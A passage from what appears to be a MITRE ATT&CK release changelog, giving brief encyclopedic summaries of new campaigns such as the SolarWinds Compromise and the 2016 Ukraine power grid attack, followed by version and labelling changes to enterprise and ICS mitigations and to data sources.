Description: [Operation Ghost](https://attack.mitre.org/campaigns/C0023) was an [APT29](https://attack.mitre.org/groups/G0016) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.(Citation: ESET Dukes October 2019)


[C0024] SolarWinds Compromise

Current version: 1.0

Description: The [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) was a sophisticated supply chain cyber operation conducted by [APT29](https://attack.mitre.org/groups/G0016) that was discovered in mid-December 2020. [APT29](https://attack.mitre.org/groups/G0016) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: SolarWinds Advisory Dec 2020)(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)(Citation: Unit 42 SolarStorm December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: Microsoft Internal Solorigate Investigation Blog) In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to Russia's Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)(Citation: Mandiant UNC2452 APT29 April 2022) The US government assessed that of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much smaller number were compromised by follow-on [APT29](https://attack.mitre.org/groups/G0016) activity on their systems.(Citation: USG Joint Statement SolarWinds January 2021)

Minor Version Changes

[C0001] Frankenstein

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-09-21 15:15:43.055000+00:00 → 2023-03-22 03:55:03.775000+00:00
x_mitre_attack_spec_version: 3.0.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[C0012] Operation CuckooBees

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-13 15:10:42.515000+00:00 → 2023-03-22 05:06:05.468000+00:00
x_mitre_attack_spec_version: 3.0.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[C0014] Operation Wocao

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-13 17:42:00.940000+00:00 → 2023-03-22 05:07:13.071000+00:00
x_mitre_attack_spec_version: 3.0.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

ics-attack

New Campaigns

[C0025] 2016 Ukraine Electric Power Attack

Current version: 1.0

Description: [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)


[C0020] Maroochy Water Breach

Current version: 1.0

Description: [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020) was an incident in 2000 where an adversary leveraged the local government’s wastewater control system and stolen engineering equipment to disrupt and eventually release 800,000 liters of raw sewage into the local community.(Citation: Marshall Abrams July 2008)

Mitigations

enterprise-attack

Minor Version Changes

[M1047] Audit

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-21 15:52:12.722000+00:00 → 2023-03-31 14:50:47.704000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2

[M1028] Operating System Configuration

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2020-06-19 16:50:45.681000+00:00 → 2023-03-31 17:27:28.395000+00:00
x_mitre_version: 1.1 → 1.2

[M1024] Restrict Registry Permissions

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2019-06-06 20:58:59.577000+00:00 → 2023-03-31 17:12:06.164000+00:00
x_mitre_version: 1.0 → 1.1

ics-attack

New Mitigations

[M0818] Validate Program Inputs

Current version: 1.0

Description: Devices and programs designed to interact with control system parameters should validate the format and content of all user inputs and actions to ensure the values are within intended operational ranges. These values should be evaluated and further enforced through the program logic running on the field controller. If a problematic or invalid input is identified, the programs should either utilize a predetermined safe value or enter a known safe state, while also logging or alerting on the event.(Citation: PLCTop20 Mar 2023)

Minor Version Changes

[M0814] Static Network Configuration

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various MitM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.

New Description:
Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.

Details
dictionary_item_added
STIX Field: New Value
labels: ['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2022-10-24 15:09:07.609000+00:00 → 2023-04-05 14:21:27.977000+00:00
description: Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various MitM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations. → Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1
Patches

[M0801] Access Management

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:14.081000+00:00

[M0936] Account Use Policies

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.11', 'IEC 62443-4-2:2019 - CR 1.11', 'NIST SP 800-53 Rev. 4 - IA-5']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:19.383000+00:00

[M0949] Antivirus/Antimalware

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2', 'NIST SP 800-53 Rev. 4 - SI-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:21.180000+00:00

[M0913] Application Developer Guidance

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - AT-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:16.730000+00:00

[M0948] Application Isolation and Sandboxing

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 5.4', 'IEC 62443-4-2:2019 - CR 5.4', 'NIST SP 800-53 Rev. 4 - SI-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:21.006000+00:00

[M0947] Audit

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.4', 'IEC 62443-4-2:2019 - CR 3.4', 'NIST SP 800-53 Rev. 4 - SI-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:20.836000+00:00

[M0800] Authorization Enforcement

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:13.851000+00:00

[M0946] Boot Integrity

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-4-2:2019 - CR 3.14', 'NIST SP 800-53 Rev. 4 - SI-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:20.632000+00:00

[M0945] Code Signing

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.4', 'IEC 62443-4-2:2019 - CR 3.4', 'NIST SP 800-53 Rev. 4 - SI-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:20.464000+00:00

[M0802] Communication Authenticity

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.1', 'IEC 62443-4-2:2019 - CR 3.1', 'NIST SP 800-53 Rev. 4 - SC-8; SC-23']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:14.263000+00:00

[M0953] Data Backup

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 7.3', 'IEC 62443-4-2:2019 - CR 7.3', 'NIST SP 800-53 Rev. 4 - CP-9']
values_changed
STIX Field | Old value | New Value
modified | 2022-05-06 17:47:24.040000+00:00 | 2023-03-30 20:55:21.679000+00:00

[M0803] Data Loss Prevention

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:14.442000+00:00

[M0942] Disable or Remove Feature or Program

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:20.110000+00:00

[M0808] Encrypt Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1', 'NIST SP 800-53 Rev. 4 - SC-8']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:15.230000+00:00

[M0941] Encrypt Sensitive Information

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1', 'NIST SP 800-53 Rev. 4 - SC-28']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:19.946000+00:00

[M0938] Execution Prevention

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2', 'NIST SP 800-53 Rev. 4 - SI-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:19.774000+00:00

[M0950] Exploit Protection

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2', 'NIST SP 800-53 Rev. 4 - SI-16']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:21.352000+00:00

[M0937] Filter Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1', 'NIST SP 800-53 Rev. 4 - AC-3; SC-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:19.604000+00:00

[M0804] Human User Authentication

Current version: 1.0


Old Description: Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [https://attack.mitre.org/mitigations/M1052/ User Account Control].

New Description: Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).
Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.1', 'IEC 62443-4-2:2019 - CR 1.1', 'NIST SP 800-53 Rev. 4 - IA-2']
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:14.615000+00:00
description | Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [https://attack.mitre.org/mitigations/M1052/ User Account Control]. | Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[M0935] Limit Access to Resource Over Network

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1', 'NIST SP 800-53 Rev. 4 - AC-3; SC-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:19.179000+00:00

[M0934] Limit Hardware Installation

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - EDR 3.2', 'NIST SP 800-53 Rev. 4 - MP-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:19.007000+00:00

[M0806] Minimize Wireless Signal Propagation

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.6', 'IEC 62443-4-2:2019 - CR 1.6', 'NIST SP 800-53 Rev. 4 - SC-40']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:14.800000+00:00

[M0932] Multi-factor Authentication

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.7', 'IEC 62443-4-2:2019 - CR 1.7', 'NIST SP 800-53 Rev. 4 - IA-2']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:18.842000+00:00

[M0807] Network Allowlists

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - AC-3']
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:14.969000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[M0931] Network Intrusion Prevention

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 6.2', 'IEC 62443-4-2:2019 - CR 6.2', 'NIST SP 800-53 Rev. 4 - SI-4']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:18.665000+00:00

[M0930] Network Segmentation

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1', 'NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:18.480000+00:00

[M0928] Operating System Configuration

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:18.276000+00:00

[M0809] Operational Information Confidentiality

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:15.415000+00:00

[M0810] Out-of-Band Communications Channel

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - SC-37']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:15.598000+00:00

[M0927] Password Policies

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.5', 'IEC 62443-4-2:2019 - CR 1.5', 'NIST SP 800-53 Rev. 4 - IA-5']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:18.097000+00:00

[M0926] Privileged Account Management

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.3', 'IEC 62443-4-2:2019 - CR 1.3', 'NIST SP 800-53 Rev. 4 - AC-2']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:17.929000+00:00

[M0811] Redundancy of Service

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - CP-9']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:15.773000+00:00

[M0922] Restrict File and Directory Permissions

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-6']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:17.592000+00:00

[M0944] Restrict Library Loading

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
x_mitre_deprecated |  | False
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-04-11 20:51:32.610000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[M0924] Restrict Registry Permissions

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1', 'NIST SP 800-53 Rev. 4 - AC-6']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:17.759000+00:00

[M0921] Restrict Web-Based Content

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 2.4', 'IEC 62443-4-2:2019 - HDR 2.4', 'NIST SP 800-53 Rev. 4 - SC-18']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:17.426000+00:00

[M0954] Software Configuration

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7', 'NIST SP 800-53 Rev. 4 - CM-7']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:21.915000+00:00

[M0813] Software Process and Device Authentication

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.2', 'IEC 62443-4-2:2019 - CR 1.2', 'NIST SP 800-53 Rev. 4 - IA-9']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:15.949000+00:00

[M0817] Supply Chain Management

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - SA-12']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:16.556000+00:00

[M0951] Update Software

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-4-2:2019 - CR 3.10', 'NIST SP 800-53 Rev. 4 - SI-2']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:21.512000+00:00

[M0918] User Account Management

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-3-3:2013 - SR 1.3', 'IEC 62443-4-2:2019 - CR 1.3', 'NIST SP 800-53 Rev. 4 - AC-2']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:17.252000+00:00

[M0917] User Training

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - AT-2']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:17.076000+00:00

[M0916] Vulnerability Scanning

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['NIST SP 800-53 Rev. 4 - RA-5']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:16.897000+00:00

[M0815] Watchdog Timers

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
labels |  | ['IEC 62443-4-2:2019 - CR 7.2']
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-30 20:55:16.383000+00:00

Data Sources

enterprise-attack

Patches

[DS0017] Command

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:55:31.986Z | 2023-04-20T18:38:00.625Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0017 | https://attack.mitre.org/datasources/DS0017
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0022] File

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-21T14:50:59.123Z | 2022-12-07T19:35:34.863Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0022 | https://attack.mitre.org/datasources/DS0022
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0028] Logon Session

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:56:16.481Z | 2022-12-07T19:45:09.019Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0028 | https://attack.mitre.org/datasources/DS0028
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0004] Malware Repository

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-20T20:20:36.693Z | 2022-12-07T19:49:46.256Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0004 | https://attack.mitre.org/datasources/DS0004
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0029] Network Traffic

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-20T20:18:34.334Z | 2023-04-20T18:38:13.356Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0029 | https://attack.mitre.org/datasources/DS0029
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0009] Process

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:58:32.516Z | 2023-04-20T18:38:26.515Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0009 | https://attack.mitre.org/datasources/DS0009
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0012] Script

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:58:58.335Z | 2022-12-07T19:50:56.964Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0012 | https://attack.mitre.org/datasources/DS0012
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[DS0013] Sensor Health

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-20T20:22:52.060Z | 2023-04-20T18:38:40.409Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0013 | https://attack.mitre.org/datasources/DS0013
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms |  | Android
x_mitre_platforms |  | iOS
x_mitre_domains |  | mobile-attack

[DS0002] User Account

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21T15:59:59.646Z | 2022-12-07T19:50:43.993Z
external_references[0]['url'] | https://attack.mitre.org/data-sources/DS0002 | https://attack.mitre.org/datasources/DS0002
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

mobile-attack

New Data Sources

[DS0041] Application Vetting

Current version: 1.0

Description: Application vetting report generated by an external cloud service.


[DS0017] Command

Current version: 1.1

Description: A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)


[DS0029] Network Traffic

Current version: 1.1

Description: Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)


[DS0009] Process

Current version: 1.1

Description: Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)


[DS0013] Sensor Health

Current version: 1.1

Description: Information from host telemetry providing insights about system status, errors, or other notable functional activity


[DS0042] User Interface

Current version: 1.0

